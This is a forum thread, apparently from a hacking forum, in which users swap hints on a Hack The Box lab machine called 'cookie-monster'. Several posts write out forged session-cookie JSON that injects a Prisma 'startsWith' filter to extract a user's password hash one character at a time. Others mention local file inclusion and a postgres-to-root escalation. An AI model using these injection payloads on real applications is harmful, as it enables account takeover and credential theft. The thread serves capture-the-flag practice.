[monkeythefirst]

Hi everybody. What problem with cookie-monster? PLS any hint

[dsqdqsfqfsdgtru]

Hi !

I'm also stuck to gaining access to postgres user.
I think it's a JSON injection like :

"{"flashes":{"info":[],"error":[],"success":["."]},"user":{"id":1,"username":"'WESLEY', process.env.NODE: { startsWith: 'p'"}}"'

can someone give us an hint to forge this cookie ?

[cavour13]

This box is definitely not a medium diffculty

---

HTB should really revise their methods of box difficulty rating

it was revised from medium to hard ! and i think it's like an insane one!...

i got lfi but i can't enumerate users!  i know that prisma client is the key but i can't immaginate how to inject json too!

[cavour13]

it's only user : pass

[clotheslineman]

Hi !

I'm also stuck to gaining access to postgres user.
I think it's a JSON injection like :

"{"flashes":{"info":[],"error":[],"success":["."]},"user":{"id":1,"username":"'WESLEY', process.env.NODE: { startsWith: 'p'"}}"'

can someone give us an hint to forge this cookie ?

VERY close my friend, the payload should look more like:
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "p"}}}

[clotheslineman]

VERY close my friend, the payload should look more like:
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "p"}}}

FCK! But i try this, it's not work for me.... where you see answer with passwords?

When you send this (notice no password) to /home/:
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY",}}

You'll get a page that has all of WESLEY's files since it's searching for files belonging to someone with the username WESLEY.

If you send this:
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "p"}}}

You'll only get the list of all of WESLEY's files **IFF** his password hash starts with "p", otherwise you'll get a shorter page than what you got with the first cookie. The hashes are stored as hex so the only valid characters to guess are 0-9 and a-f which should make the next steps much easier. You'll essentially be guessing and checking along the lines of this:

{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "0"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "1"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "2"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "20"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "21"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "22"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "23"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "24"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "240"}}}
...

[clotheslineman]

VERY close my friend, the payload should look more like:
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "p"}}}

FCK! But i try this, it's not work for me.... where you see answer with passwords?

When you send this (notice no password) to /home/:
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY",}}

You'll get a page that has all of WESLEY's files since it's searching for files belonging to someone with the username WESLEY.

If you send this:
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "p"}}}

You'll only get the list of all of WESLEY's files **IFF** his password hash starts with "p", otherwise you'll get a shorter page than what you got with the first cookie. The hashes are stored as hex so the only valid characters to guess are 0-9 and a-f which should make the next steps much easier. You'll essentially be guessing and checking along the lines of this:

{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "0"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "1"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "2"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "20"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "21"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "22"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "23"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "24"}}}
{"flashes":{"info":[],"error":[],"success":[]},"user":{"username":"WESLEY", "password": { "startsWith": "240"}}}
...

Yea thank you i alreagy got it... fck... i'm dumb

Hey, don't worry about it, I was stuck on it from Sunday until yesterday xD Now if you manage to find a way to root the machine I will be very interested in hearing what you find

I personally automated it with a small ~140 line JavaScript program I wrote, but I'm sure there are other methods you could use for that

[clotheslineman]

Hey, don't worry about it, I was stuck on it from Sunday until yesterday xD Now if you manage to find a way to root the machine I will be very interested in hearing what you find

I personally automated it with a small ~140 line JavaScript program to automate it for me, but I'm sure there are other methods you could use for that

Thank you
I think root is over my skills

That's entirely fair, I'm starting to think the same   The issue is the exploit required (I think) is easy enough to pull off, but I need access to the postgres user in order to do it. I believe this is the exploit we'll have to use since root commonly uses "su -l postgres", but I can't figure out how to get access to that postgres user

[cutty]

Hey, don't worry about it, I was stuck on it from Sunday until yesterday xD Now if you manage to find a way to root the machine I will be very interested in hearing what you find

I personally automated it with a small ~140 line JavaScript program to automate it for me, but I'm sure there are other methods you could use for that

Thank you
I think root is over my skills

That's entirely fair, I'm starting to think the same   The issue is the exploit required (I think) is easy enough to pull off, but I need access to the postgres user in order to do it. I believe this is the exploit we'll have to use since root commonly uses "su -l postgres", but I can't figure out how to get access to that postgres user

Getting a shell as root is the same as the shell as postgres, simply exploited differently. They are the same because the creds you find to first gain access to postgres give you {pg_write_server_files} privileges. If you simply write a test file to disk, it will be owned by postrgres.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad.onion/contact if you feel this is incorrect.

[clotheslineman]

Hey, don't worry about it, I was stuck on it from Sunday until yesterday xD Now if you manage to find a way to root the machine I will be very interested in hearing what you find

I personally automated it with a small ~140 line JavaScript program to automate it for me, but I'm sure there are other methods you could use for that

Thank you
I think root is over my skills

That's entirely fair, I'm starting to think the same   The issue is the exploit required (I think) is easy enough to pull off, but I need access to the postgres user in order to do it. I believe this is the exploit we'll have to use since root commonly uses "su -l postgres", but I can't figure out how to get access to that postgres user

Getting a shell as root is the same as the shell as postgres, simply exploited differently. They are the same because the creds you find to first gain access to postgres give you {pg_write_server_files} privileges. If you simply write a test file to disk, it will be owned by postrgres.

That's the thing, I haven't found where the postgres creds could be reachable. I checked the prisma.schema file which references an environment variable, but /proc/self/environ isn't reachable with the LFI and I can't think of any other way to find it